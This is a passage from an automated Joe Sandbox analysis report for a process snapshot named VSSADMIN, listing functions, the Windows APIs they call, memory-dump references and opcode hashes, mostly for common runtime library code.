                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3548387204-0
                                                                                                                                                                      • Opcode ID: 6f4d91f14022360dab0355fac000d53ce384dee1e6364c71d03b9cb5aa4004ae
                                                                                                                                                                      • Instruction ID: 7dac8cf696f043d08095e1d376b5c02c65d0c39e38cb242a4132a6de8e27f6f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f4d91f14022360dab0355fac000d53ce384dee1e6364c71d03b9cb5aa4004ae
                                                                                                                                                                      • Instruction Fuzzy Hash: AA119D44E0CA4343FA5877B588C62FA01B05FA3B7AF840436EB0EC71D3ED5DB8404262
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8A058 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(?,?,?,00007FF614C89ED5,?,?,00000000,00007FF614C89F8A), ref: 00007FF614C8A0C6
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C89ED5,?,?,00000000,00007FF614C89F8A), ref: 00007FF614C8A0D0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1687624791-0
                                                                                                                                                                      • Opcode ID: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
                                                                                                                                                                      • Instruction ID: 1cbc991455a442d19bc62fd000a59500d9951bf783d4da7aa4dbcd4893adfa7f
                                                                                                                                                                      • Opcode Fuzzy Hash: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
                                                                                                                                                                      • Instruction Fuzzy Hash: A421A421F18E4341FA505769A4D037D25A19F86FB4F04523BDA2EC73D6CF6EE445A301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8B634 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,?,?,00000000,00007FF614C8B7CD), ref: 00007FF614C8B680
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF614C8B7CD), ref: 00007FF614C8B68A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                      • Opcode ID: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
                                                                                                                                                                      • Instruction ID: 0cbb14d3c37acebcc0054627e3272f1c9e17f948f01dec6ec1feade9a862164d
                                                                                                                                                                      • Opcode Fuzzy Hash: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
                                                                                                                                                                      • Instruction Fuzzy Hash: E211C161B18E8281DA208B25E884169B371BB86FF4F544336EE7D8B7E9DF3CE0148700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C91BAC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF614C880B2,?,?,00000000,00007FF614C885A6,?,?,?,?,00007FF614C90554,?,?,00000000), ref: 00007FF614C91BC0
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF614C880B2,?,?,00000000,00007FF614C885A6,?,?,?,?,00007FF614C90554,?,?,00000000), ref: 00007FF614C91C2A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentStrings$Free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3328510275-0
                                                                                                                                                                      • Opcode ID: 08e1cb85d2d4b9f20ebe00a5e397d2c4a90d52e31469bbe02bcf41e4b3f4404d
                                                                                                                                                                      • Instruction ID: 86ae2a7c9ac34b9effb91f5fb758d4cce142ce8dd4377a269625a40a6aa1c3b3
                                                                                                                                                                      • Opcode Fuzzy Hash: 08e1cb85d2d4b9f20ebe00a5e397d2c4a90d52e31469bbe02bcf41e4b3f4404d
                                                                                                                                                                      • Instruction Fuzzy Hash: 61010811F18F6681EA24AF16B04106A6370AF45FF4F8C4636DF6D537C5DE2DE4428300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8B3AC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
                                                                                                                                                                      • Instruction ID: 03ae247b27809fa9dc73bbb45872fdf4a5ba0edb87a9d231745c0654aac005f1
                                                                                                                                                                      • Opcode Fuzzy Hash: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
                                                                                                                                                                      • Instruction Fuzzy Hash: B7419E32908A4787EA24CA19E58127973B1EB97FA1F140232E78EC36D1DF2CE402E750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77230 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                      • Opcode ID: 0f194d5094c1cf518840656965e69513bbf0ac4dc6595ea5cd95a1eaade7605d
                                                                                                                                                                      • Instruction ID: b63e5b07194cf5a7f77fe1ab55d2cf8db54b057f4d9f915d165a8fd17a857cbd
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f194d5094c1cf518840656965e69513bbf0ac4dc6595ea5cd95a1eaade7605d
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E21A621B0EA5647FA249B1269847FAA661BF46FE5F885432EE0D87786DE3DF041C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8AE3C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
                                                                                                                                                                      • Instruction ID: bdca0d7cf7522b048a09474cbe80d8adb55b27009ca6eefbae7a56d23ab045d5
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
                                                                                                                                                                      • Instruction Fuzzy Hash: 1531AE71A18E4385EB11AB59888037C7670AF83FB4F41063BEA2D873D2DF7DA441A714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C854F8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                      • Instruction ID: 851e6e4591848b8cd216b5c5358cf1129bc3be11b57677648a27b92bad48828b
                                                                                                                                                                      • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                      • Instruction Fuzzy Hash: 15119621A0CA5381EF609F51948027DA2B0BFD7FA5F444437EA8CC769ADF7CD500A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C9578C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
                                                                                                                                                                      • Instruction ID: 7db7c192fe2b76f524c7c5b2199fb77893a77cb47f2a59ddee350370a1325f0f
                                                                                                                                                                      • Opcode Fuzzy Hash: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
                                                                                                                                                                      • Instruction Fuzzy Hash: 8A217F33A18A4296DB618F18E48036976B0EB96FA8F244236EA5D876D5DF3DD5018B04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7F64C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                      • Instruction ID: eaf90d44afeb166a819dae1377bcbe54cf659c47168e4e3329ca6316d345c132
                                                                                                                                                                      • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                      • Instruction Fuzzy Hash: 2401A561A0CF4342E904DB5299D1079A7A1BB87FF0F084636DE5C97BEADE3CD5018704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C86B74 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
                                                                                                                                                                      • Instruction ID: b77321515603504d9b62c82e2a173a6986a4da05f98fdb29e80b7c19908d795b
                                                                                                                                                                      • Opcode Fuzzy Hash: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
                                                                                                                                                                      • Instruction Fuzzy Hash: DC113A32A18E4382F3109B14A4C0579B2B5EB86BA4F55453AE69DC77A2DF7CF810AB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8DD70 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF614C8A8E6,?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E), ref: 00007FF614C8DDC5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
                                                                                                                                                                      • Instruction ID: 2ab543c3322530bba426973a480ad6d1261eab43de51dadf3a8a2d539df9437f
                                                                                                                                                                      • Opcode Fuzzy Hash: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 12F06D44B09A4782FE585B6198D03B512B05F8BFA4F0C4433C90EC73C2EE1CE892A320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8CAFC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF614C7FE74,?,?,?,00007FF614C81386,?,?,?,?,?,00007FF614C82979), ref: 00007FF614C8CB3A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
                                                                                                                                                                      • Instruction ID: bca662125605553ae1b21a038d26fc7c5dfebe982e319e74c95680a684b58faa
                                                                                                                                                                      • Opcode Fuzzy Hash: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 72F05860F0DE8745FE2456A298D027652A05FCAFB4F080732D82EC72C2DE2CE841E120
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C771E0 Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,00000000,00007FF614C730DE), ref: 00007FF614C77203
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2592636585-0
                                                                                                                                                                      • Opcode ID: 14271922cd67107be1aa73486209c40478193cbc4b897bf2be9679daf36d23cb
